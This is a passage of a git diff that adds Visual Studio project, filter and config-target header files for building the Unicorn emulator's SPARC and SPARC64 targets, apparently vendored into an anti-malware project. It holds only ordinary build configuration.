TARGET_NAME "sparc" +#define TARGET_SPARC 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj new file mode 100644 index 0000000..77bf054 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj @@ -0,0 +1,230 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\sparc.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc\leon3.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\int32_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{698C2D54-475C-446F-B879-F629BBEF75FE}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sparcsoftmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + <DebugInformationFormat>ProgramDatabase</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader> + </PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc.h</ForcedIncludeFiles> + <DebugInformationFormat>None</DebugInformationFormat> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj.filters b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj.filters new file mode 100644 index 0000000..95458e1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc-softmmu/sparc-softmmu.vcxproj.filters @@ -0,0 +1,122 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup> + <Filter Include="fpu"> + <UniqueIdentifier>{d424a094-0a26-4db6-85e9-e75f81c6e142}</UniqueIdentifier> + </Filter> + <Filter Include="hw"> + <UniqueIdentifier>{dec3e9f1-0fc3-454e-ae70-78d866b5c3f8}</UniqueIdentifier> + </Filter> + <Filter Include="hw\sparc"> + <UniqueIdentifier>{0a04b798-735c-4115-ab62-b6cfc772efed}</UniqueIdentifier> + </Filter> + <Filter Include="target-sparc"> + <UniqueIdentifier>{10f0c533-e16b-4e31-b979-812af068bb36}</UniqueIdentifier> + </Filter> + <Filter Include="tcg"> + <UniqueIdentifier>{b229bf2b-cc40-4135-b3b7-40c73bd9f597}</UniqueIdentifier> + </Filter> + <Filter Include="tcg\i386"> + <UniqueIdentifier>{133a0d6a-6f71-4d4b-be6d-f90636aa02a2}</UniqueIdentifier> + </Filter> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h"> + <Filter>fpu</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h"> + <Filter>tcg</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h"> + <Filter>tcg\i386</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h"> + <Filter>target-sparc</Filter> + </ClInclude> + <ClInclude Include="..\..\..\qemu\sparc.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c"> + <Filter>fpu</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c"> + <Filter>tcg</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <Filter>tcg\i386</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc\leon3.c"> + <Filter>hw\sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn.c"> + <Filter>target-sparc</Filter> + </ClCompile> + <ClCompile Include="..\..\..\qemu\target-sparc\int32_helper.c"> + <Filter>target-sparc</Filter> + </ClCompile> + </ItemGroup> +</Project> \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/config-target.h b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/config-target.h new file mode 100644 index 0000000..63fa864 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/config-target.h @@ -0,0 +1,6 @@ +/* Automatically generated by create_config - do not modify */ +#define TARGET_SPARC64 1 +#define TARGET_NAME "sparc64" +#define TARGET_SPARC 1 +#define TARGET_WORDS_BIGENDIAN 1 +#define CONFIG_SOFTMMU 1 diff --git a/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj new file mode 100644 index 0000000..1f0dea5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/msvc/unicorn/sparc64-softmmu/sparc64-softmmu.vcxproj @@ -0,0 +1,231 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <ItemGroup> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-macros.h" /> + <ClInclude Include="..\..\..\qemu\fpu\softfloat-specialize.h" /> + <ClInclude Include="..\..\..\qemu\tcg\i386\tcg-target.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-ldst.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-be-null.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-op.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-opc.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg-runtime.h" /> + <ClInclude Include="..\..\..\qemu\tcg\tcg.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu-qom.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\cpu.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\helper.h" /> + <ClInclude Include="..\..\..\qemu\target-sparc\unicorn.h" /> + <ClInclude Include="..\..\..\qemu\sparc64.h" /> + <ClInclude Include="..\config-host.h" /> + <ClInclude Include="config-target.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="..\..\..\qemu\cpu-exec.c" /> + <ClCompile Include="..\..\..\qemu\cpus.c" /> + <ClCompile Include="..\..\..\qemu\cputlb.c" /> + <ClCompile Include="..\..\..\qemu\exec.c" /> + <ClCompile Include="..\..\..\qemu\fpu\softfloat.c" /> + <ClCompile Include="..\..\..\qemu\hw\sparc64\sun4u.c" /> + <ClCompile Include="..\..\..\qemu\ioport.c" /> + <ClCompile Include="..\..\..\qemu\memory.c" /> + <ClCompile Include="..\..\..\qemu\memory_mapping.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cc_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\cpu.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\fop_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\int64_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\ldst_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\mmu_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\translate.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\unicorn64.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\vis_helper.c" /> + <ClCompile Include="..\..\..\qemu\target-sparc\win_helper.c" /> + <ClCompile Include="..\..\..\qemu\tcg\i386\tcg-target.c"> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</ExcludedFromBuild> + <ExcludedFromBuild Condition="'$(Configuration)|$(Platform)'=='Release|x64'">true</ExcludedFromBuild> + </ClCompile> + <ClCompile Include="..\..\..\qemu\tcg\optimize.c" /> + <ClCompile Include="..\..\..\qemu\tcg\tcg.c" /> + <ClCompile Include="..\..\..\qemu\translate-all.c" /> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{8804AD29-E398-480C-AC0F-98EC1B7A51CB}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>sparc64softmmu</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>StaticLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>$(DefaultPlatformToolset)</PlatformToolset> + <WholeProgramOptimization>false</WholeProgramOptimization> + <CharacterSet>MultiByte</CharacterSet> + <SpectreMitigation>false</SpectreMitigation> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <IntDir>$(ProjectDir)$(Platform)\$(Configuration)\</IntDir> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__i386__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + <AdditionalOptions>/wd4018 /wd4244 /wd4267 %(AdditionalOptions)</AdditionalOptions> + <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary> + <ExceptionHandling>false</ExceptionHandling> + <ForcedIncludeFiles>sparc64.h</ForcedIncludeFiles> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + <PreBuildEvent> + <Command>..\prebuild_script.bat</Command> + </PreBuildEvent> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader> + </PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_LIB;__x86_64__;%(PreprocessorDefinitions);_CRT_SECURE_NO_WARNINGS;inline=__inline;__func__=__FUNCTION__;NEED_CPU_H;WIN32_LEAN_AND_MEAN</PreprocessorDefinitions> + <AdditionalIncludeDirectories>.;..;../../../qemu;../../../qemu/include;../../../qemu/tcg;../../../qemu/tcg/i386;../../../qemu/target-sparc;../../../include</AdditionalIncludeDirectories> + 